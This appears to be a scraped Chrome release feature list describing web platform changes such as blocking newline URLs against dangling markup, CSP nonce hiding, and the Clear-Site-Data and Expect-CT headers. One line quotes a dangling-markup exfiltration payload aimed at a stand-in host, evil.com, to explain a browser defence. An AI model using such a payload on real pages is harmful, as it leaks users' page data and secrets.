Chrome version: 125, 124, 123, 122, 121, 120, 119, 118, 117, 116, 115, 114, 113, 112, 111, 110, 109, 108, 107, 106, 105, 104, 103, 102, 101, 100, 99, 98, 97, 96, 95, 94, 93, 92, 91, 90, 89, 88, 87, 86, 85, 84, 83, 82, 81, 80, 79, 78, 77, 76, 75, 74, 73, 72, 71, 70, 69, 68, 67, 66, 65, 64, 63, 62, 61, 60, 59, 58, 57, 56, 55, 54, 53, 52, 51, 50, 49, 48, 47, 46, 45, 44, 43, 42, 41, 40, 39, 38, 37, 36, 35, 34, 33, 32, 31, 30, 29, 28, 27, 26, 25, 24, 23, 22, 21, 20, 19, 18, 17, 16, 15, 14, 13, 12, 11, 10, 9, 8, 7, 6, 5, 4, 3, 2, 1, 0
This release of Chrome had 30 new features.
As discussed in https://groups.google.com/a/chromium.org/d/msg/blink-dev/KaA_YNOlTPk/VmmoV88xBgAJ, some forms of dangling markup attacks rely upon injecting an unclosed attribute that sucks up portions of a page, and exfiltrates them to an external endpoint (e.g. `<img src='https://evil.com/?` eats the page until the next `'`). This is possible because the URL parser helpfully discards newline characters. It would be lovely if we could make the parser less helpful. #
This feature was specified in this Spec.
CSP's Embedded enforcement defines a mechanism by which a web page can embed a nested browsing context if and only if it agrees to enforce a particular set of restrictions upon itself. We should prototype an implementation to see if it's something that solves real problems in a way we can ship. #
This feature was specified in this Spec.
We've seen some recent attacks on CSP which rely on the ability to exfiltrate nonce data via various mechanisms that can grab data from content attributes. CSS selectors are the best example. To mitigate these attacks, we'll hide the attribute from these side-channels, and only expose the value to script. #
This feature was specified in this Spec.
Docs: https://github.com/whatwg/dom/pull/436
No linked samplesAdds an optional argument to existing scroll APIs that specifies whether scrolling should be smooth. Also adds a CSS property for this. #
This feature was specified in this Spec.
Docs: https://developer.mozilla.org/en-US/docs/Web/API/Element/scrollIntoView
No linked samplesA ‘Clear-Site-Data’ HTTP header prompts the user agent to clear browsing data associated with the requesting website. The supported browsing data types are cookies, storage (i.e. “site data”), and cache. This is a privacy and security enhancing feature. A sensitive website can trigger local data deletion after the user signs out. A website dealing with a persistent XSS attack can use this to ‘reset’ itself to a clean state. #
This feature was specified in this Spec.
Docs: https://docs.google.com/document/d/1I6m4QwbTNhG6wdtazamhTnArJN-UMUGqpvwH6InBEaM/
Samples: https://github.com/w3c/webappsec-clear-site-data/tree/master/demo
Add the replace() function to DOMTokenList interface. We can use it like element.classList.replace('inactive', 'active'). #
This feature was specified in this Spec.
Docs: https://developer.mozilla.org/en-US/docs/Web/API/DOMTokenListhttps://developer.mozilla.org/en-US/docs/Web/API/DOMTokenList/replace
No linked samplesExpect-CT is an HTTP header that allows sites to opt in to reporting and/or enforcement of Certificate Transparency requirements, which prevents the use of misissued certificates for that site from going unnoticed. When a site enables the Expect-CT header, they are requesting that Chrome check that any certificate for that site appears in public CT logs. #
This feature was specified in this Spec.
This specification describes several geometry interfaces for the representation of points, rectangles, quadrilaterals and transformation matrices with the dimension of 3x2 and 4x4. SVGPoint, SVGRect and SVGMatrix will be aliased to new interfaces. Their old methods will be maintained and some new methods are introduced. In the near future, CSS transform will be updated so they can work directly with the new objects. This avoid parsing on the js side. #
This feature was specified in this Spec.
Samples: https://hacks.mozilla.org/2014/03/introducing-the-getboxquads-api/
Returns a Boolean indicating whether the Payment Request API may be invoked on a cross-origin iframe. #
This feature was specified in this Spec.
Docs: https://developer.mozilla.org/en-US/docs/Web/API/HTMLIFrameElement/allowPaymentRequest
Samples: https://rsolomakhin.github.io/pr/iframe/
Client header to expose the device Memory to web applications. #
This feature was specified in this Spec.
Docs: https://github.com/w3c/device-memory#the-headerhttps://developer.mozilla.org/en-US/docs/Web/HTTP/Content_negotiation
No linked samplesUpdate Blink to match the CSSOM View spec’s behavior around element scrolling APIs for documentElement and body, i.e.: scrollTop, scrollLeft, scrollWidth, scrollHeight and Document.scrollingElement #
This feature was specified in this Spec.
Docs: https://github.com/operasoftware/devopera/issues/242
No linked samplesThe smoothscroll.js code is largely broken and is preventing us from shipping scroll top interop. With the scroll top interop behavior activated sites fail to scroll at all with the wheel event. This library was corrected a few years ago but the web continues to clone the broken version and we have been blocked in shipping this long implemented fix for interop. Smooth scroll has been enabled in Chrome for a number of releases so using custom smooth scrolling is not necessary anymore. #
This feature was specified in this Spec.
Docs: https://docs.google.com/document/d/1yMAUU0wCeP7BIlQujqfwe3LBnG0QJaqymbkZwor9u60/edit#
No linked samples